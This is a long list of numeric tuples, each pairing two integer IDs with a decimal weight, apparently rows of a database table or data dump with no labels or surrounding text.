(161, 189584, 0.93331),
(161, 189585, 0.86331),
(304, 189585, 0.86331),
(161, 189586, 0.95669),
(304, 189586, 0.95669),
(161, 189587, 0.95669),
(161, 189588, 1.05),
(161, 189589, 2.4),
(161, 189590, 2.8),
(161, 189602, 2.6),
(161, 189603, 1.09669),
(161, 189680, 0.74676),
(161, 189681, 1.05),
(161, 189682, 1.28331),
(161, 189683, 1.00331),
(161, 189684, 1.07331),
(161, 189685, 0.95669),
(161, 189686, 1.26),
(161, 189687, 0.98),
(161, 189688, 1.19),
(161, 189689, 0.46662),
(161, 189690, 0.93331),
(161, 189691, 1.05),
(161, 189692, 1.02669),
(161, 189693, 1.07331),
(161, 189694, 0.46669),
(161, 189695, 1.14331),
(161, 189696, 1.26),
(161, 189697, 1.02669),
(161, 189698, 1.19),
(161, 189699, 0.42),
(161, 189700, 1.09669),
(161, 189701, 1.35331),
(161, 189702, 0.28),
(161, 189703, 0.98),
(161, 189704, 1.09669),
(161, 189705, 0.32669),
(161, 189706, 0.95669),
(161, 189707, 1.12),
(161, 189708, 0.32669),
(161, 189709, 1.02669),
(161, 189710, 1.14331),
(193, 190897, 0.23331),
(174, 190897, 1.16655),
(193, 190906, 0.93331),
(263, 190906, 0.93331),
(272, 190906, 0.93331),
(280, 190906, 0.93331),
(193, 190925, 0.88669),
(178, 190925, 1.77338),
(264, 190935, 1.00331),
(275, 190935, 1.00331),
(193, 190935, 2.00662),
(193, 190953, 0.91),
(305, 190953, 0.91),
(193, 191150, 0.81669),
(249, 191150, 0.81669),
(193, 191151, 0.91),
(249, 191151, 0.91),
(193, 191441, 0.93331),
(267, 191441, 0.93331),
(288, 191441, 0.93331),
(193, 191478, 0.98),
(247, 191478, 0.98),
(246, 192595, 0.32669),
(267, 192595, 0.32669),
(168, 197606, 0.86331),
(168, 197607, 0.95669),
(168, 197752, 0.93331),
(168, 197753, 1.00331),
(168, 197754, 0.86331),
(168, 197755, 0.98),
(168, 197756, 0.42),
(168, 197757, 1.23669),
(168, 197758, 1.33),
(168, 197759, 0.37331),
(306, 197759, 0.37331),
(168, 197760, 1.09669),
(168, 197761, 1.19),
(168, 197762, 0.46669),
(168, 197763, 1.14331),
(168, 197764, 1.37669),
(168, 197765, 0.86331),
(168, 197766, 0.98),
(168, 197767, 0.91),
(168, 197768, 1.05),
(168, 197769, 1.21331),
(168, 197770, 0.93331),
(168, 197771, 1.05),
(168, 197772, 1.02669),
(168, 197773, 1.14331),
(168, 197774, 1.09669),
(168, 197775, 1.16669),
(168, 197776, 0.84),
(168, 197777, 0.93331),
(168, 197778, 0.95669),
(168, 197779, 0.86331),
(168, 197780, 0.98),
(168, 197781, 0.84),
(168, 197782, 0.98),
(168, 197783, 0.95669),
(168, 197784, 1.05),
(168, 197798, 0.98),
(168, 197799, 1.21331),
(168, 197800, 1.05),
(168, 197801, 1.19),
(168, 197802, 1.68),
(174, 197802, 1.68),
(178, 197802, 1.68),
(168, 197803, 0.98),
(168, 197804, 1.26),
(168, 197805, 0.98),
(168, 197806, 1.12),
(168, 197807, 0.91),
(168, 197808, 1.09669),
(168, 197809, 0.32669),
(168, 197810, 0.98),
(168, 197811, 1.07331),
(168, 197812, 0.88669),
(168, 197813, 1.00331),
(168, 197814, 1.02669),
(168, 197815, 0.88669),
(168, 197816, 1.05),
(168, 197817, 0.95669),
(168, 197818, 0.95669),
(168, 197819, 1.91338),
(168, 197820, 0.98),
(168, 197821, 3.67992),
(168, 197822, 0.91),
(168, 197823, 1.00331),
(168, 197824, 1.00331),
(168, 197825, 1.00331),
(168, 197826, 1.09669),
(168, 197827, 0.98),
(168, 197828, 1.09669),
(168, 197980, 0.91),
(168, 197981, 0.95669),
(168, 197982, 0.95669),
(168, 197983, 1.02669),
(168, 197984, 0.95669),
(168, 197985, 0.93331),
(174, 197985, 0.93331),
(168, 197986, 1.12),
(168, 197987, 1.00331),
(168, 197988, 2.14662),
(168, 197989, 1.26),
(168, 197990, 1.19),
(168, 197991, 1.09669),
(168, 197992, 1.37669),
(168, 197993, 1.05),
(168, 197994, 0.95669),
(168, 197995, 1.09669),
(168, 197996, 1.82),
(168, 197997, 1.05),
(168, 197998, 1.21331),
(168, 197999, 0.91),
(306, 197999, 0.91),
(168, 198000, 0.88669),
(168, 198001, 0.93331),
(168, 198002, 0.93331),
(178, 198002, 0.93331),
(168, 198003, 2.4666),
(168, 198004, 2.9334),
(168, 198013, 2.6666),
(168, 198014, 0.86331),
(168, 198015, 0.98),
(168, 198098, 0.32669),
(168, 198099, 0.93331),
(168, 198100, 1.02669),
(168, 198101, 0.88669),
(168, 198102, 0.95669),
(168, 198103, 0.32669),
(168, 198104, 0.93331),
(168, 198105, 1.00331),
(168, 198106, 0.91),
(168, 198107, 1.00331),
(168, 198108, 0.28),
(168, 198109, 1.02669),
(168, 198110, 1.14331),
(168, 198111, 0.37331),
(274, 198111, 0.37331),
(168, 198112, 0.95669),
(168, 198113, 1.09669),
(168, 198114, 0.14),
(168, 198115, 0.88669),
(168, 198116, 1.07331),
(168, 198117, 0.32669),
(168, 198118, 0.95669),
(168, 198119, 1.02669),
(168, 198120, 1.00331),
(174, 198120, 5.01655),
(168, 198121, 1.82),
(168, 198122, 1.02669),
(168, 198123, 1.02669),
(168, 198124, 0.86331),
(174, 198124, 0.86331),
(168, 198125, 0.95669),
(168, 198126, 0.88669),
(168, 198127, 1.07331),
(168, 198128, 0.91),
(168, 198129, 1.09669),
(168, 198130, 0.28),
(168, 198131, 0.93331),
(168, 198132, 1.07331),
(168, 198133, 0.93331),
(174, 198133, 0.93331),
(168, 198134, 1.02669),
(168, 198135, 0.91),
(168, 198136, 1.05),
(168, 198137, 1.91338),
(168, 198138, 1.07331),
(168, 198139, 1.07331),
(168, 198140, 2.32339),
(174, 198140, 7.79019),
(168, 198141, 2.60661),
(168, 198142, 0.98),
(168, 198143, 1.16669),
(168, 198144, 0.93331),
(168, 198145, 1.05),
(168, 198146, 0.84),
(168, 198147, 0.88669),
(168, 198148, 0.46669),
(275, 198148, 0.46669),
(174, 198148, 1.40007),
(168, 198149, 1.00331),
(168, 198150, 1.07331),
(168, 198151, 0.09331),
(174, 198151, 0.37324),
(168, 198152, 0.84),
(168, 198153, 0.88669),
(168, 198154, 0.91),
(168, 198155, 1.00331),
(168, 198156, 1.82),
(168, 198157, 1.00331),
(168, 198158, 1.05),
(168, 198159, 1.77338),
(168, 198160, 0.95669),
(168, 198161, 0.93331),
(174, 200884, 0.98),
(178, 200884, 0.98),
(174, 200886, 0.23331),
(178, 200886, 0.46662),
(174, 200889, 0.37331),
(178, 200889, 1.86655),
(178, 201143, 0.95669),
(174, 201143, 1.91338),
(178, 212308, 0.28),
(263, 212308, 0.28),
(174, 214924, 1.58662),
(174, 214925, 0.86331),
(174, 214926, 0.86331),
(174, 214927, 0.88669),
(174, 214928, 1.05),
(174, 214929, 0.56),
(174, 214930, 0.98),
(174, 214931, 1.05),
(174, 214932, 0.91),
(174, 214933, 1.02669),
(174, 215214, 1.07331),
(174, 215215, 1.05),
(174, 215216, 1.16669),
(174, 215217, 1.02669),
(174, 215218, 1.14331),
(174, 215219, 1.12),
(174, 215220, 1.05),
(174, 215221, 1.33),
(174, 215222, 1.02669),
(174, 215223, 1.21331),
(174, 215224, 1.14331),
(174, 215225, 1.19),
(174, 215226, 1.07331),
(174, 215227, 0.93331),
(265, 215227, 0.93331),
(266, 215227, 0.93331),
(174, 215228, 1.00331),
(174, 215229, 0.91),
(174, 215230, 1.00331),
(174, 215231, 0.32669),
(174, 215232, 0.98),
(174, 215233, 1.05),
(174, 215234, 1.02662),
(174, 215235, 1.23669),
(174, 215236, 1.30669),
(174, 215237, 1.02669),
(174, 215238, 1.12),
(174, 215239, 0.95669),
(174, 215240, 1.02669),
(174, 215241, 1.02669),
(249, 215241, 1.02669),
(174, 215242, 1.09669),
(174, 215243, 1.07331),
(174, 215244, 1.16669),
(174, 215245, 1.07331),
(174, 215246, 0.88669),
(174, 215247, 1.00331),
(174, 215283, 0.98),
(174, 215284, 1.09669),
(174, 215285, 1.16669),
(174, 215286, 1.26),
(174, 215287, 0.88669),
(174, 215288, 0.98),
(290, 215289, 0.28),
(174, 215289, 1.12),
(174, 215290, 1.02669),
(174, 215291, 1.23669),
(174, 215292, 0.98),
(174, 215293, 1.23669),
(174, 215294, 0.95669),
(174, 215295, 1.16669),
(174, 215296, 0.95669),
(174, 215297, 1.12),
(174, 215298, 1.07331),
(174, 215299, 1.21331),
(174, 215300, 0.86331),
(174, 215301, 0.95669),
(174, 215302, 0.91),
(174, 215303, 1.05),
(174, 215304, 1.00331),
(174, 215305, 1.07331),
(174, 215306, 2.66007),
(174, 215307, 1.02669),
(174, 215308, 2.00662),
(174, 215309, 0.91),
(174, 215310, 1.05),
(174, 215311, 1.00331),
(174, 215312, 0.98),
(174, 215313, 1.05),
(174, 215314, 0.84),
(174, 215315, 0.95669),
(174, 215316, 1.02669),
(174, 215317, 1.12),
(264, 215318, 0.91),
(174, 215318, 1.82),
(174, 215319, 1.05),
(174, 215320, 1.09669),
(174, 215321, 1.14331),
(174, 215322, 1.00331),
(174, 215323, 8.36019),
(174, 215324, 10.0702),
(174, 215325, 6.58014),
(174, 215326, 1.14331),
(174, 215327, 0.93331),
(174, 215328, 1.19),
(174, 215329, 0.88669),
(174, 215330, 0.95669),
(174, 215331, 1.05),
(174, 215332, 1.14331),
(174, 215333, 0.91),
(174, 215334, 1.02669),
(174, 215335, 0.93331),
(174, 215336, 1.00331),
(174, 215337, 0.93331),
(174, 215338, 1.05),
(174, 215419, 0.91),
(174, 215420, 0.98),
(174, 215421, 0.81669),
(269, 215421, 1.63338),
(174, 215422, 0.88669),
(174, 215423, 0.88669),
(174, 215424, 1.00331),
(174, 215425, 0.86331),
(290, 215425, 0.86331),
(174, 215426, 0.95669),
(290, 215426, 0.95669),
(174, 215427, 1.00331),
(174, 215428, 1.07331),
(174, 215429, 1.16669),
(174, 215430, 1.02669),
(306, 215430, 1.02669),
(174, 215431, 1.14331),
(174, 215432, 0.95669),
(174, 215433, 0.88669),
(174, 215434, 0.98),
(174, 215435, 0.91),
(174, 215436, 0.98),
(174, 215437, 1.05),
(174, 215438, 0.98),
(174, 215439, 0.93331),
(174, 215440, 1.12),
(174, 215441, 1.09669),
(174, 215442, 0.88669),
(174, 215443, 1.00331),
(174, 215444, 1.00331),
(174, 215445, 1.07331),
(174, 215446, 1.02669),
(174, 215447, 1.05),
(174, 215448, 1.00331),
(174, 215449, 1.07331),
(174, 215450, 1.02669),
(174, 215451, 1.05),
(174, 215452, 0.51331),
(174, 215453, 1.05),
(174, 215454, 1.14331),
(174, 215455, 1.07331),
(174, 215456, 1.16669),
(174, 215457, 1.00331),
(174, 215458, 0.95669),
(174, 215459, 1.00331),
(174, 215460, 1.07331),
(174, 215461, 0.88669),
(174, 215462, 1.05),
(174, 215463, 0.93331),
(174, 215464, 0.95669),
(174, 215465, 1.02669),
(247, 215465, 1.02669),
(174, 215466, 0.98),
(174, 215467, 1.05),
(174, 215468, 0.93331),
(174, 215469, 0.88669),
(174, 215470, 0.98),
(174, 215471, 0.95669),
(174, 215472, 1.05),
(174, 215473, 1.02669),
(174, 215474, 1.00331),
(174, 215475, 0.95669),
(174, 215476, 0.95669),
(174, 215477, 2.4666),
(174, 215478, 2.8666),
(174, 215489, 2.6666),
(174, 215490, 0.93331),
(174, 215491, 1.09669),
(174, 215642, 1.07331),
(174, 215643, 1.19),
(174, 215644, 0.93331),
(270, 215644, 0.93331),
(301, 215644, 0.93331),
(306, 215644, 0.93331),
(174, 215645, 1.12),
(174, 215646, 1.02669),
(174, 215647, 0.93331),
(174, 215648, 1.05),
(174, 215649, 0.95669),
(174, 215650, 1.07331),
(174, 215651, 0.46669),
(174, 215652, 1.00331),
(174, 215653, 1.09669),
(174, 215654, 1.05),
(174, 215655, 0.93331),
(174, 215656, 1.00331),
(272, 215656, 1.00331),
(280, 215656, 1.00331),
(174, 215657, 0.86331),
(174, 215658, 0.98),
(174, 215659, 0.23331),
(174, 215660, 0.91),
(174, 215661, 1.05),
(174, 215662, 0.95669),
(174, 215663, 1.00331),
(174, 215664, 0.98),
(174, 215665, 1.19),
(174, 215666, 1.14331),
(174, 215667, 2.00662),
(174, 215668, 0.93331),
(174, 215669, 0.95669),
(174, 215670, 0.98),
(174, 215671, 1.12),
(174, 215672, 1.02669),
(174, 215673, 0.91),
(174, 215674, 1.12),
(174, 215675, 1.14331),
(174, 215676, 1.00331),
(265, 215676, 1.00331),
(266, 215676, 1.00331),
(174, 215677, 1.12),
(174, 215678, 0.95669),
(174, 215679, 1.16669),
(174, 215680, 9.87981),
(174, 215681, 1.02669),
(174, 215682, 1.14331),
(174, 215683, 0.37331),
(174, 215684, 1.00331),
(174, 215685, 1.21331),
(174, 215686, 0.98),
(174, 215687, 1.19),
(174, 215688, 0.42),
(174, 215689, 0.98),
(174, 215690, 1.02669),
(174, 215691, 1.02669),
(174, 215692, 1.14331),
(174, 215693, 1.00331),
(174, 215694, 1.12),
(174, 215695, 1.00331),
(174, 215696, 1.05),
(174, 215697, 0.81669),
(174, 215698, 0.86331),
(174, 215699, 1.63338),
(174, 215700, 0.91),
(174, 215701, 0.95669),
(174, 215702, 0.28),
(174, 215703, 0.91),
(174, 215704, 0.95669),
(174, 215705, 0.93331),
(306, 215705, 1.86662),
(274, 215705, 4.66655),
(174, 215706, 1.02669),
(274, 215706, 2.05338),
(306, 215706, 2.05338),
(262, 217195, 0.42),
(272, 217195, 0.42),
(280, 217195, 0.42),
(305, 217195, 0.42),
(262, 217203, 1.00331),
(265, 217203, 1.00331),
(266, 217203, 1.00331),
(262, 217204, 1.09669),
(265, 217204, 1.09669),
(266, 217204, 1.09669),
(262, 217268, 0.93331),
(263, 217268, 0.93331),
(267, 217353, 0.95669),
(268, 217353, 0.95669),
(262, 217353, 1.91338),
(262, 217354, 1.00331),
(267, 217354, 1.00331),
(268, 217354, 1.00331),
(304, 217354, 1.00331),
(247, 217547, 0.32669),
(262, 217547, 0.32669),
(268, 217564, 0.93331),
(262, 217564, 2.79993),
(268, 217565, 1.02669),
(262, 217565, 3.08007),
(178, 221202, 0.81669),
(178, 221203, 0.88669),
(178, 221204, 0.91),
(178, 221205, 1.00331),
(178, 221609, 1.07331),
(178, 221610, 1.14331),
(178, 221611, 1.00331),
(178, 221612, 1.23669),
(178, 221613, 0.86331),
(178, 221614, 1.00331),
(178, 221615, 0.84),
(178, 221616, 0.88669),
(178, 221617, 1.19),
(178, 221618, 0.84),
(178, 221619, 0.95669),
(178, 221620, 1.86662),
(178, 221621, 1.05),
(178, 221622, 0.42),
(178, 221623, 1.07331),
(178, 221624, 1.14331),
(178, 221625, 0.88669),
(178, 221626, 1.09669),
(178, 221627, 0.88669),
(178, 221628, 1.02669),
(178, 221629, 0.42),
(178, 221630, 1.02669),
(178, 221631, 1.12),
(178, 221632, 1.05),
(178, 221633, 1.37669),
(178, 221634, 1.00331),
(178, 221635, 1.23669),
(178, 221636, 1.00331),
(178, 221637, 1.09669),
(178, 221638, 0.98),
(178, 221639, 1.02669),
(178, 221640, 1.02669),
(178, 221641, 1.26),
(178, 221642, 0.98),
(178, 221643, 1.23669),
(178, 221644, 0.95669),
(178, 221645, 1.00331),
(178, 221646, 0.93331),
(178, 221647, 1.07331),
(178, 221648, 0.95669),
(178, 221649, 1.07331),
(178, 221650, 1.00331),
(178, 221651, 1.12),
(178, 221652, 1.12),
(178, 221653, 1.26),
(178, 221654, 0.84),
(178, 221655, 1.91338),
(178, 221656, 1.02669),
(178, 221657, 1.09669),
(178, 221658, 0.93331),
(178, 221659, 1.00331),
(178, 221660, 0.98),
(178, 221661, 1.05),
(178, 221662, 1.09669),
(178, 221663, 0.18669),
(290, 221663, 0.18669),
(178, 221664, 0.86331),
(178, 221665, 1.00331),
(178, 221666, 0.86331),
(178, 221667, 0.93331),
(178, 221668, 1.07331),
(178, 221669, 1.19),
(178, 221670, 0.37331),
(178, 221671, 0.95669),
(178, 221672, 1.07331),
(178, 221673, 0.79331),
(178, 221674, 0.91),
(178, 221675, 0.98),
(178, 221676, 1.05),
(178, 221677, 2.00662),
(178, 221678, 0.79331),
(178, 221679, 1.72662),
(178, 221680, 0.93331),
(178, 221681, 0.98),
(178, 221682, 0.32669),
(178, 221683, 0.95669),
(178, 221684, 1.16669),
(178, 221685, 0.23331),
(290, 221685, 0.23331),
(178, 221686, 0.95669),
(178, 221687, 1.14331),
(288, 221688, 0.28),
(292, 221688, 0.28),
(178, 221688, 0.56),
(178, 221689, 0.93331),
(178, 221690, 1.07331),
(178, 221691, 0.91),
(178, 221692, 1.12),
(178, 221749, 0.37331),
(178, 221750, 0.98),
(178, 221751, 1.12),
(178, 221752, 0.42),
(178, 221753, 1.02669),
(178, 221754, 1.09669),
(178, 221755, 2.66007),
(178, 221756, 0.93331),
(178, 221757, 2.00662),
(178, 221758, 0.84),
(178, 221759, 2.00662),
(178, 221760, 2.56662),
(178, 221761, 1.05),
(178, 221762, 0.91),
(178, 221763, 1.00331),
(178, 221764, 0.98),
(178, 221765, 1.16669),
(178, 221766, 0.84),
(178, 221767, 0.95669),
(178, 221768, 0.88669),
(178, 221769, 0.91),
(178, 221770, 0.91),
(178, 221771, 0.98),
(178, 221772, 1.82),
(178, 221773, 2.38),
(178, 221774, 2.72),
(178, 221775, 0.88669),
(178, 221776, 1.00331),
(178, 221777, 1.96),
(178, 221778, 0.93331),
(178, 221779, 0.37331),
(178, 221780, 1.09669),
(178, 221781, 1.21331),
(178, 221782, 0.28),
(274, 221782, 0.28),
(304, 221782, 0.28),
(178, 221783, 0.91),
(178, 221784, 1.00331),
(178, 221785, 0.91),
(178, 221786, 1.02669),
(178, 221787, 0.88669),
(178, 221788, 0.98),
(178, 221789, 0.98),
(178, 221790, 1.07331),
(178, 221791, 1.02669),
(178, 221792, 1.12),
(178, 221793, 0.91),
(178, 221794, 1.16669),
(178, 221795, 1.05),
(178, 221796, 0.86331),
(178, 221797, 0.98),
(178, 221798, 1.02669),
(178, 221799, 0.98),
(178, 221800, 0.95669),
(178, 221801, 1.05),
(178, 221802, 2.05338),
(178, 221803, 1.12),
(178, 221804, 1.07331),
(178, 221805, 0.93331),
(178, 221806, 1.05),
(178, 221807, 0.86331),
(178, 221808, 1.09669),
(178, 221809, 1.72662),
(178, 221810, 1.07331),
(178, 221811, 0.98),
(178, 221812, 2.05338),
(178, 221813, 1.05),
(178, 221814, 1.05),
(178, 221815, 1.00331),
(178, 221816, 0.91),
(178, 221817, 1.02669),
(178, 221818, 0.93331),
(178, 221819, 1.05),
(178, 221820, 0.88669),
(178, 221821, 0.98),
(178, 221822, 0.95669),
(178, 221823, 1.96),
(178, 221824, 0.98),
(178, 221825, 1.02669),
(178, 221826, 1.07331),
(178, 221827, 1.21331),
(178, 221828, 0.98),
(178, 221829, 1.12),
(178, 221830, 1.00331),
(178, 221831, 1.07331),
(178, 221832, 0.7),
(178, 221833, 1.30669),
(178, 221834, 1.4),
(178, 222000, 0.84),
(290, 222000, 0.84),
(178, 222001, 0.93331),
(178, 222002, 1.02669),
(178, 222003, 0.98),
(178, 222004, 0.95669),
(178, 222005, 0.95669),
(178, 222006, 2.66007),
(178, 222007, 2.00662),
(178, 222008, 0.93331),
(178, 222009, 1.09669),
(178, 222010, 0.86331),
(178, 222011, 0.91),
(178, 222012, 0.84),
(178, 222013, 0.91),
(178, 222014, 2.58993),
(178, 222015, 2.00662),
(178, 222016, 0.93331),
(178, 222017, 0.81669),
(273, 222017, 0.81669),
(178, 222018, 0.88669),
(178, 222019, 0.86331),
(178, 222020, 0.95669),
(178, 222021, 0.86331),
(178, 222022, 0.93331),
(178, 222023, 1.02669),
(178, 222024, 0.93331),
(178, 222025, 1.02669),
(178, 222026, 0.91),
(178, 222027, 1.02669),
(178, 222028, 0.91),
(178, 222029, 1.09669),
(178, 222030, 0.79331),
(178, 222031, 0.91),
(178, 222032, 0.84),
(178, 222033, 0.93331),
(178, 222034, 0.93331),
(178, 222035, 0.95669),
(178, 222036, 1.00331),
(178, 222037, 0.91),
(178, 222038, 0.98),
(178, 222039, 0.95669),
(178, 222040, 0.91),
(178, 222041, 0.98),
(178, 222042, 0.91),
(178, 222043, 1.05),
(178, 222044, 4.43345),
(178, 222045, 1.02669),
(178, 222046, 1.02669),
(178, 222047, 1.09669),
(178, 222048, 1.02669),
(178, 222049, 1.05),
(178, 222050, 0.88669),
(306, 222050, 1.77338),
(178, 222051, 1.02669),
(178, 222052, 0.91),
(178, 222053, 0.95669),
(178, 222054, 0.81669),
(292, 222054, 0.81669),
(306, 222054, 1.63338),
(269, 222054, 3.26676),
(178, 222055, 0.93331),
(178, 222056, 1.02669),
(178, 222057, 1.02669),
(178, 222058, 0.93331),
(305, 222058, 0.93331),
(178, 222059, 1.05),
(269, 222059, 1.05),
(178, 222060, 1.02669),
(178, 222061, 1.14331),
(178, 222062, 0.88669),
(178, 222063, 0.95669),
(178, 222064, 1.72662),
(178, 222065, 2.00662),
(178, 222066, 0.84),
(274, 222066, 0.84),
(178, 222067, 1.00331),
(178, 222068, 1.00331),
(178, 222069, 0.98),
(178, 222070, 2.1),
(178, 222071, 0.98),
(178, 222072, 0.86331),
(178, 222073, 0.98),
(178, 222074, 0.93331),
(178, 222075, 1.02669),
(178, 222076, 1.05),
(178, 222077, 1.86662),
(178, 222078, 1.02669),
(178, 222079, 0.93331),
(178, 222080, 0.91),
(178, 222081, 1.00331),
(178, 222082, 0.91),
(178, 222083, 1.02669),
(178, 222084, 0.98),
(178, 222085, 0.98),
(178, 222086, 1.00331),
(178, 222087, 0.95669),
(178, 222088, 0.95669),
(178, 222089, 0.86331),
(178, 222090, 1.02669),
(178, 222091, 0.32669),
(178, 222092, 1.00331),
(178, 222093, 1.09669),
(178, 222094, 0.91),
(178, 222095, 1.05),
(178, 222096, 0.95669),
(178, 222097, 0.93331),
(178, 222098, 1.00331),
(178, 222099, 0.98),
(178, 222100, 1.05),
(178, 222101, 0.88669),
(178, 222102, 0.98),
(178, 222103, 0.95669),
(178, 222104, 0.98),
(178, 222105, 1.00331),
(178, 222106, 1.16669),
(178, 222107, 0.95669),
(178, 222108, 0.93331),
(178, 222109, 1.09669),
(178, 222110, 1.12),
(178, 222111, 0.91),
(178, 222112, 0.95669),
(178, 222113, 3.64),
(178, 222114, 0.98),
(178, 222115, 0.95669),
(178, 222116, 0.95669),
(178, 222117, 0.95669),
(275, 222118, 0.86331),
(178, 222118, 1.72662),
(178, 222119, 1.86662),
(178, 222120, 0.91),
(178, 222121, 1.00331),
(178, 222122, 0.93331),
(178, 222123, 1.02669),
(178, 222124, 2.4666),
(178, 222125, 3.2),
(178, 222152, 2.6666),
(178, 222153, 0.93331),
(178, 222154, 1.02669),
(178, 222155, 0.91),
(178, 222156, 0.98),
(178, 222157, 0.18669),
(274, 222157, 0.18669),
(178, 222158, 0.88669),
(178, 222159, 0.98),
(178, 222160, 0.23331),
(178, 222161, 0.88669),
(178, 222162, 1.09669),
(178, 222163, 0.32669),
(178, 222164, 1.00331),
(178, 222165, 1.16669),
(305, 222520, 0.18669),
(178, 222520, 0.56007),
(178, 222521, 0.91),
(178, 222522, 1.00331),
(178, 222523, 0.84),
(178, 222524, 0.91),
(178, 222525, 0.86331),
(178, 222526, 1.02669),
(178, 222527, 0.46662),
(178, 222528, 1.72662),
(178, 222529, 0.93331),
(178, 222530, 1.02669),
(178, 222531, 0.18669),
(178, 222532, 0.84),
(178, 222533, 1.00331),
(178, 222534, 0.88669),
(178, 222535, 0.98),
(178, 222536, 1.82),
(178, 222537, 2.00662),
(178, 222538, 0.42),
(178, 222539, 0.98),
(178, 222540, 1.21331),
(178, 222541, 0.93331),
(178, 222542, 1.05),
(178, 222543, 0.32669),
(178, 222544, 1.05),
(178, 222545, 1.14331),
(178, 222546, 0.18669),
(178, 222547, 0.84),
(178, 222548, 0.88669),
(178, 222549, 0.46669),
(178, 222550, 1.09669),
(178, 222551, 1.19),
(178, 222552, 0.32669),
(178, 222553, 0.95669),
(178, 222554, 1.05),
(178, 222555, 0.32669),
(178, 222556, 0.93331),
(178, 222557, 1.02669),
(178, 222558, 0.32669),
(178, 222559, 0.95669),
(178, 222560, 1.05),
(178, 222561, 0.42),
(178, 222562, 0.98),
(178, 222563, 1.12),
(178, 222564, 0.98),
(178, 222565, 1.12),
(178, 222566, 0.95669),
(178, 222567, 1.05),
(178, 222568, 0.91),
(178, 222569, 1.00331),
(178, 222570, 1.00331),
(178, 222571, 1.09669),
(178, 222572, 1.26),
(178, 222573, 0.98),
(178, 222574, 1.07331),
(178, 222575, 2.00662),
(178, 222576, 1.26),
(178, 222577, 1.21331),
(178, 222578, 2.49339),
(178, 222579, 0.42),
(178, 222580, 1.12),
(178, 222581, 1.16669),
(178, 222582, 0.91),
(178, 222583, 1.09669),
(178, 222584, 0.93331),
(178, 222585, 1.00331),
(178, 222586, 0.46669),
(178, 222587, 1.02669),
(178, 222588, 1.14331),
(178, 222589, 0.32669),
(178, 222590, 0.91),
(178, 222591, 1.05),
(178, 222592, 0.86331),
(178, 222593, 0.91),
(178, 222594, 0.91),
(178, 222595, 0.95669),
(178, 222596, 0.91),
(178, 222597, 1.05),
(178, 222598, 0.18669),
(178, 222599, 0.86331),
(178, 222600, 0.93331),
(178, 222601, 0.95669),
(178, 222602, 1.16669),
(263, 227423, 0.32669),
(274, 227423, 0.32669),
(263, 227507, 0.95669),
(274, 227507, 0.95669),
(247, 228966, 1.00331),
(249, 228966, 1.00331),
(248, 228966, 3.00993),
(247, 229000, 0.98),
(248, 229000, 0.98),
(275, 229114, 0.18669),
(306, 229114, 0.18669),
(247, 229114, 0.56007),
(275, 229115, 0.86331),
(247, 229115, 2.58993),
(264, 232096, 0.37331),
(265, 232096, 0.37331),
(266, 232096, 0.37331),
(248, 233473, 0.86331),
(272, 233473, 0.86331),
(280, 233473, 0.86331),
(248, 233524, 0.95669),
(270, 233524, 0.95669),
(301, 233524, 0.95669),
(193, 238114, 0.79331),
(193, 238115, 1.00331),
(193, 238466, 0.04669),
(306, 238466, 0.04669),
(193, 238467, 0.81669),
(193, 238468, 0.98),
(193, 238469, 1.00331),
(193, 238470, 1.09669),
(193, 238471, 0.91),
(193, 238472, 1.09669),
(193, 238473, 0.98),
(193, 238474, 1.12),
(193, 238475, 0.51331),
(193, 238476, 1.02669),
(193, 238477, 1.07331),
(193, 238478, 0.37331),
(193, 238479, 0.95669),
(193, 238480, 1.14331),
(193, 238481, 0.42),
(273, 238481, 0.84),
(193, 238482, 1.00331),
(193, 238483, 1.19),
(193, 238484, 0.98),
(275, 238484, 0.98),
(193, 238485, 1.09669),
(275, 238485, 1.09669),
(193, 238486, 1.02669),
(193, 238487, 1.14331),
(193, 238488, 0.32669),
(193, 238489, 0.93331),
(193, 238490, 1.07331),
(193, 238491, 0.98),
(193, 238492, 1.02669),
(193, 238493, 0.98),
(193, 238494, 1.07331),
(193, 238495, 2.87007),
(193, 238496, 2.05338),
(193, 238497, 1.05),
(193, 238498, 0.98),
(193, 238499, 1.09669),
(193, 238500, 0.98),
(193, 238501, 1.12),
(193, 238502, 1.91338),
(193, 238503, 1.21331),
(193, 238504, 1.26),
(193, 238505, 0.98),
(193, 238506, 1.00331),
(193, 238507, 0.93331),
(193, 238508, 0.95669),
(193, 238509, 0.98),
(193, 238510, 0.98),
(193, 238511, 0.88669),
(193, 238512, 1.05),
(193, 238513, 0.91),
(193, 238514, 0.95669),
(193, 238515, 1.07331),
(193, 238516, 1.09669),
(193, 238517, 0.95669),
(193, 238518, 1.07331),
(193, 238519, 0.91),
(193, 238520, 1.09669),
(193, 238521, 1.05),
(193, 238522, 1.12),
(193, 238523, 0.93331),
(193, 238524, 1.00331),
(193, 238525, 0.86331),
(193, 238526, 0.98),
(193, 238527, 0.95669),
(193, 238528, 1.09669),
(193, 238529, 0.23331),
(193, 238530, 0.86331),
(193, 238531, 1.07331),
(193, 238532, 0.91),
(193, 238533, 1.05),
(193, 238534, 0.14),
(193, 238535, 0.84),
(193, 238536, 0.95669),
(193, 238537, 0.88669),
(193, 238538, 1.00331),
(193, 238609, 0.37331),
(193, 238610, 0.98),
(193, 238611, 1.07331),
(193, 238612, 2.1),
(193, 238613, 1.14331),
(193, 238614, 1.14331),
(193, 238615, 1.00331),
(193, 238616, 1.12),
(193, 238617, 0.28),
(193, 238618, 0.91),
(193, 238619, 1.09669),
(193, 238620, 0.23331),
(193, 238621, 0.86331),
(193, 238622, 1.00331),
(193, 238623, 0.32669),
(193, 238624, 0.95669),
(193, 238625, 1.14331),
(193, 238626, 3.82676),
(193, 238627, 1.02669),
(193, 238628, 1.07331),
(193, 238629, 1.07331),
(193, 238630, 1.07331),
(193, 238631, 0.91),
(193, 238632, 1.05),
(193, 238633, 0.46669),
(193, 238634, 1.21331),
(193, 238635, 1.35331),
(193, 238636, 1.09669),
(193, 238637, 1.21331),
(193, 238638, 0.91),
(193, 238639, 1.09669),
(193, 238640, 0.93331),
(193, 238641, 1.16669),
(193, 238642, 1.05),
(193, 238643, 1.16669),
(193, 238644, 0.81669),
(193, 238645, 0.91),
(193, 238646, 1.07331),
(193, 238647, 0.95669),
(275, 238647, 0.95669),
(292, 238647, 0.95669),
(193, 238648, 1.05),
(193, 238649, 1.02669),
(193, 238650, 1.05),
(193, 238651, 1.14331),
(193, 238652, 0.98),
(193, 238653, 1.19),
(193, 238654, 1.09669),
(193, 238655, 1.07331),
(193, 238656, 1.12),
(193, 238657, 1.09669),
(193, 238658, 1.00331),
(193, 238659, 0.88669),
(193, 238660, 0.98),
(193, 238661, 0.23331),
(193, 238662, 0.88669),
(193, 238663, 1.12),
